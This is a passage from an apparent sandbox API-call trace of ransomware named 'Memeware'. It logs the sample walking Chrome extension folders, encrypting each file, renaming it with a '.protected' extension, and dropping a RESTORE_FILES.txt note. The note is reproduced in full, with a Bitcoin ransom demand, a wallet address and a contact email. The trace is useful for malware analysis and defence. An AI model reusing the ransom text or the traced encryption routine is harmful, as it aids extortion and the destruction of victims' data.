(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.086] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.086] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.086] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.087] CloseHandle (hObject=0x164) returned 1 [0079.087] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.087] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0079.087] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0079.087] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0079.087] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0079.087] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0079.087] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr") returned 141 [0079.087] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0079.087] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0079.087] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\*") returned 143 [0079.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.087] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.087] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.087] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.087] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.087] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.087] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\.") returned 143 [0079.087] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.087] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.087] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.087] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.087] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.087] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.087] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.087] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\..") returned 144 [0079.087] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.087] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.087] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.087] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.087] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.087] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.087] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.087] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.088] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json") returned 155 [0079.088] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.088] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.088] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.088] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.088] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json") returned 155 [0079.088] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.088] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json") returned 155 [0079.089] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.089] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json") returned 155 [0079.089] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.089] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf8, lpOverlapped=0x0) returned 1 [0079.089] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.089] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf8, lpOverlapped=0x0) returned 1 [0079.090] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.090] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.090] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.090] CloseHandle (hObject=0x168) returned 1 [0079.090] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.protected") returned 165 [0079.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.protected")) returned 1 [0079.090] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.090] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.090] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\RESTORE_FILES.txt") returned 159 [0079.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.091] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.091] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.091] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.091] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.092] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.092] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.092] CloseHandle (hObject=0x164) returned 1 [0079.092] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.092] lstrcmpiW (lpString1="sv", lpString2="Windows") returned -1 [0079.092] lstrcmpiW (lpString1="sv", lpString2="Program Files") returned 1 [0079.092] lstrcmpiW (lpString1="sv", lpString2="Program Files (x86)") returned 1 [0079.092] lstrcmpiW (lpString1="sv", lpString2="$Recycle.bin") returned 1 [0079.092] lstrcmpiW (lpString1="sv", lpString2="System Volume Information") returned -1 [0079.092] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv") returned 141 [0079.092] lstrcmpW (lpString1="sv", lpString2=".") returned 1 [0079.092] lstrcmpW (lpString1="sv", lpString2="..") returned 1 [0079.092] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\*") returned 143 [0079.092] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.092] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.092] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.092] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.092] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.092] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.092] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\.") returned 143 [0079.092] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.092] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.092] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.092] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.092] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.092] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.092] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.092] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\..") returned 144 [0079.093] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.093] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.093] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.093] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.093] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.093] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.093] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.093] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.093] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json") returned 155 [0079.093] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.093] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.093] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.093] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json") returned 155 [0079.093] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json") returned 155 [0079.093] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json") returned 155 [0079.093] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.093] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd6, lpOverlapped=0x0) returned 1 [0079.094] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.094] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd6, lpOverlapped=0x0) returned 1 [0079.094] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.094] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.095] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.095] CloseHandle (hObject=0x168) returned 1 [0079.095] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.protected") returned 165 [0079.095] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.protected")) returned 1 [0079.095] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.095] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.095] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\RESTORE_FILES.txt") returned 159 [0079.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.096] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.096] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.097] lstrlenA 